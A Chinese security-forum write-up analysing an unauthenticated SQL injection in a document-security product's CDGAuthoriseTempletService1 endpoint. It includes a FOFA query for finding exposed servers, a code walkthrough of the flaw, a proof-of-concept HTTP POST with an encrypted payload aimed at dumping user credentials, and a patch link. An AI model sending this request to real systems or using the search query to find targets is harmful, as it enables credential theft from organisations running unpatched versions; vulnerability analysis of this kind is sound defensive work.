奇安信攻防社区-某通文档xxx系统sql注入分析

某通文档xxx系统sql注入分析

一.漏洞描述
------

某通文档xxx系统(简称CDG)是一款综合性的数据智能安全产品，主要用于保护电子文档的安全某通文档xxx系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码，利用该漏洞对数据库执行任意 SQL 操作，获取所有用户的账户密码信息。

资产测绘搜索语句
--------

fofa:  
body="/CDGServer3/index.jsp"

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-94ff8d81f8d8dfa1291e4e5b7f8a11bb474854b0.png)

二.影响厂商产品
--------

某通文档xxx系统version&lt;5.6.3.152.179受影响。

三.漏洞分析
------

漏洞点快速查找，拿到源代码后，根据某步平台给出路径CDGAuthoriseTempletService1查找相关类文件

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-d5d7a5e4f9adee6a228688514aaa778d76c17d63.png)

文件路径为：\\tomcat\\webapps\\CDGServer3\\WEB-INF\\lib\\jhiberest.jar!\\com\\esafenet\\servlet\\service\\document\\CDGAuthoriseTempletService1.class

首先分析下路由与鉴权

分析web.xml配置文件

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-539562c95e7f14bb76a9d1a9c97bfaa7e9114431.png)

在该漏洞版本的代码中，该/CDGAuthoriseTempletService1/接口路径未设置serssion效验

对比新版代码里的xml文件，显而易见已增加效验  
![520c4b79117734ab774e7de6479a8d5.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a303d39f5c5bbfbf6a7cdfe42a4154534ae8c02f.png)

GetCDGAuthoriseTemplet gcat = (GetCDGAuthoriseTemplet)this.xStream.fromXML(toServerXML);  
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4e5ad1e5d3391586820b6e22a6d90c4a0b821c8e.png)

继续分析漏洞点，使用`XStream`库将名为`toServerXML`的XML字符串解析成`GetCDGAuthoriseTemplet`类型的Java对象，并将这个对象赋值给名为`gcat`的变量

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-e57b9dac07b92f35819d6ce0bfd2ef44763252dd.png)

跟进代码发现调⽤validateInfo对其进⾏检查，验证用户ID（`userId`）和密级ID（`secretLevelId`）的有效性，进入else需要返回true才行所以我们要知道一个一定存在用户名，默认系统用户为SystemAdmin

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-c6cb0c1f7aec76c094aa68c020aeb840a63c3080.png)

继续跟进发现调⽤ getAuthoriseTempletList 方法  
，发现此处进行拼接查询  
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-9a27a3265f2f27797b5e1057a4c263e59537a790.png)

userId固定，注入参数为secretLevelId，构造xml数据包

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-e073ff8052f213b2f82f5e3b338c6670a2634b5c.png)

需要利用工具加密

poc：

POST /CDGServer3/CDGAuthoriseTempletService1 HTTP/1.1

Host: x  
Content-Type: application/xml  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

CGKFAICMPFGICCPHKFGGGBOMICMOKOBGPCBLKPCAHAGPFJHFABCPPKIOHIAIBJLLHJCODJMAGKBGIKDAFJHJMMKBDHABAJPBFNLBOIDFBHMMFKFHLPIAOPHEOAICJEMBCKFEIPGINHHBEGDOMEOPDKJGPNIJEDNOMEKLJHCGOJCEIPFPEDGBEHJLMNEEFIKFPGCCKCFCCOMONKACOEENLFIBAGNJBLHDEJCIPHOPDOAMGLINIEJDIFOLLGEDIDMDAKIPEINHHOFBOHLPEJBPJBKJLDDEIFOGLGHKANECEEGNDCNMJNLNJBFKNGKKJFODMFEKBOGFNDNJMCMHOFJBLGHEBALFGNNGLPBMKHHHGNKNHJGLFLODDIKAAOOOAJAEMBLBNMGOFJELPABKOEGMFLIBGPMHJPEJCKFBGHHNGMDAJBKBNNMIMFELPGEHDFGNHMBLEIKMINOAOAINBLEOIGHAMOPDNOIFFEFLGBFOFAGACH

四.漏洞复现
------

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fd07a3312fc7250a784c5c4e3c0c963bbefbab38.png)

官网补丁
----

<https://update.nsfocus.com/update/downloads/id/159558>

发表于 2024-08-09 14:44:43
阅读 ( 4551 )
分类：OA产品

6 条评论

罗辑 1秒前

666

低哼 1秒前

tql

罗辑 1秒前

太强了，有点看懂了

NanNnCheng 1秒前

lihua666a 1秒前

666

十倍大的甜甜花 1秒前

这个加密哪来的，什么加密

lei_sec 回复十倍大的甜甜花

DecryptTools

2025-01-15 10:19
回复